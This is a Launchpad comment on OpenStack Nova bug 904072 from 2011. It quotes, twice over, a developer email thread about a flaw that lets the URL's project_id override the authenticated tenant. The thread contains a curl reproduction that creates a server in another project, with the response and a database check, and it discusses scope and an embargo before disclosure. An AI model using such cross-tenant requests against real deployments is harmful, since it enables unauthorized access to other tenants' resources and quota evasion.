OpenStack Compute (nova)

Bug #904072
Comment #11

Comment 11 for bug 904072

Revision history for this message

Nachi Ueno (nati-ueno) wrote on 2011-12-17: Re: [Bug 904072] Re: project_id could be overwritten to any value by URI value

#11

Hi All

>ttx
I'm ok to not disclosing this in the next two
weeks. Me, Rohit and Ravi found this bug.

>Vish
Thank you for your patch.
I have one question. Why we still set project_id from URL?

Cheers
Nati

2011/12/16 Vish Ishaya <email address hidden>:
> Comments below
>
> On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
>
>> ttx
>>
>> 1) you still need to be authenticated. The keystone middleware doesn't
>> let the request hit the router if you fail to auth.
>>
>> 2) you can issue any openstack api request against any tenant.
>>
>> Because most logic in the API uses the context (not the URL) to specify
>> the resources you are interacting with (for example list servers uses
>> the tenant from the context)
>>
>> instance_list = self.compute_api.get_all(context,
>> search_opts=search_opts)
>>
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>>
>> So you can create a server in another project but delete, list, show
>> (and most other api calls) will not be able to modify it by via the api.
>> This is because the way that the database layer is written is defensive
>> - it only lets you access data that your context says you have access
>> to.
>>
>> This is still bad in that it allows creation of resources outside of
>> your project (for quota/billing avoidance) and there could be more
>> tunnels.
>
> I believe this is incorrect. The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>>
>> 3) only affects if you are the openstack api using keystone (not
>> deprecated auth)
>>
>> It shouldn't affect people who use the default (which is nova's internal
>> legacy auth) or who use the ec2 api
>
> legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected.
>>
>> --
>> You received this bug notification because you are a member of Nova
>> Core, which is subscribed to the bug report.
>> https://bugs.launchpad.net/bugs/904072
>>
>> Title:
>> project_id could be overwritten to any value by URI value
>>
>> Status in OpenStack Compute (Nova):
>> Confirmed
>>
>> Bug description:
>> project_id could be overwritten to any value by URI value.
>> User can create server on any project (even if it is not exist)
>> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>>
>> --Test condition
>> user : demo (not admin)
>> project_id: 2
>>
>> -- Requeest
>> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>>
>> -- Response
>> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>>
>> -- DB result
>> instance with project_id "tushar2" is created
>>
>> mysql> select id,project_id from instances;
>> +----+------------+
>> | id | project_id |
>> +----+------------+
>> | 1 | demo5 |
>> | 2 | demo5 |
>> | 3 | tushar |
>> | 4 | tushar1 |
>> | 5 | tushar2 |
>> | 6 | tushar2 |
>> | 7 | tushar2 |
>> +----+------------+
>> 7 rows in set (0.00 sec)
>>
>> --Cause of this bug
>> This code set project_id to request object from uri
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>>
>> Then this code set the project_id to context object
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>>
>> To manage notifications about this bug go to:
>> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/904072
>
> Title:
> project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
> Confirmed
>
> Bug description:
> project_id could be overwritten to any value by URI value.
> User can create server on any project (even if it is not exist)
> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
> --Test condition
> user : demo (not admin)
> project_id: 2
>
> -- Requeest
> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>
> -- Response
> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>
> -- DB result
> instance with project_id "tushar2" is created
>
> mysql> select id,project_id from instances;
> +----+------------+
> | id | project_id |
> +----+------------+
> | 1 | demo5 |
> | 2 | demo5 |
> | 3 | tushar |
> | 4 | tushar1 |
> | 5 | tushar2 |
> | 6 | tushar2 |
> | 7 | tushar2 |
> +----+------------+
> 7 rows in set (0.00 sec)
>
> --Cause of this bug
> This code set project_id to request object from uri
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>
> Then this code set the project_id to context object
> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions

Hi All

>ttx
I'm ok to not disclosing this in the next two
weeks. Me, Rohit and Ravi found this bug.

>Vish
Thank you for your patch.
I have one question. Why we still set project_id from URL?

Cheers
Nati

2011/12/16 Vish Ishaya <vishvananda@gmail.com>:
> Comments below
>
> On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
>
>> ttx
>>
>> 1) you still need to be authenticated.  The keystone middleware doesn't
>> let the request hit the router if you fail to auth.
>>
>> 2) you can issue any openstack api request against any tenant.
>>
>> Because most logic in the API uses the context (not the URL) to specify
>> the resources you are interacting with (for example list servers uses
>> the tenant from the context)
>>
>>        instance_list = self.compute_api.get_all(context,
>>                                                 search_opts=search_opts)
>>
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>>
>> So you can create a server in another project but delete, list, show
>> (and most other api calls) will not be able to modify it by via the api.
>> This is because the way that the database layer is written is defensive
>> - it only lets you access data that your context says you have access
>> to.
>>
>> This is still bad in that it allows creation of resources outside of
>> your project (for quota/billing avoidance) and there could be more
>> tunnels.
>
> I believe this is incorrect.  The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>>
>> 3) only affects if you are the openstack api using keystone (not
>> deprecated auth)
>>
>> It shouldn't affect people who use the default (which is nova's internal
>> legacy auth) or who use the ec2 api
>
> legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url.  EC2 auth shouldn't be affected.
>>
>> --
>> You received this bug notification because you are a member of Nova
>> Core, which is subscribed to the bug report.
>> https://bugs.launchpad.net/bugs/904072
>>
>> Title:
>>  project_id could be overwritten to any value by URI value
>>
>> Status in OpenStack Compute (Nova):
>>  Confirmed
>>
>> Bug description:
>>  project_id could be overwritten to any value by URI value.
>>  User can create server on any project (even if it is not exist)
>>  Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>>
>>  --Test condition
>>  user : demo (not admin)
>>  project_id: 2
>>
>>  -- Requeest
>>  stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers  <-- invalid tenant_id
>>
>>  -- Response
>>  {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>>
>>  -- DB result
>>  instance with project_id "tushar2" is created
>>
>>  mysql> select id,project_id from instances;
>>  +----+------------+
>>  | id | project_id |
>>  +----+------------+
>>  |  1 | demo5      |
>>  |  2 | demo5      |
>>  |  3 | tushar     |
>>  |  4 | tushar1    |
>>  |  5 | tushar2    |
>>  |  6 | tushar2    |
>>  |  7 | tushar2    |
>>  +----+------------+
>>  7 rows in set (0.00 sec)
>>
>>  --Cause of this bug
>>  This code set project_id to request object from uri
>>  https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>>
>>  Then this code set the project_id to context object
>>  https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>>
>> To manage notifications about this bug go to:
>> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/904072
>
> Title:
>  project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
>  Confirmed
>
> Bug description:
>  project_id could be overwritten to any value by URI value.
>  User can create server on any project (even if it is not exist)
>  Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
>  --Test condition
>  user : demo (not admin)
>  project_id: 2
>
>  -- Requeest
>  stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers  <-- invalid tenant_id
>
>  -- Response
>  {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>
>  -- DB result
>  instance with project_id "tushar2" is created
>
>  mysql> select id,project_id from instances;
>  +----+------------+
>  | id | project_id |
>  +----+------------+
>  |  1 | demo5      |
>  |  2 | demo5      |
>  |  3 | tushar     |
>  |  4 | tushar1    |
>  |  5 | tushar2    |
>  |  6 | tushar2    |
>  |  7 | tushar2    |
>  +----+------------+
>  7 rows in set (0.00 sec)
>
>  --Cause of this bug
>  This code set project_id to request object from uri
>  https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>
>  Then this code set the project_id to context object
>  https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions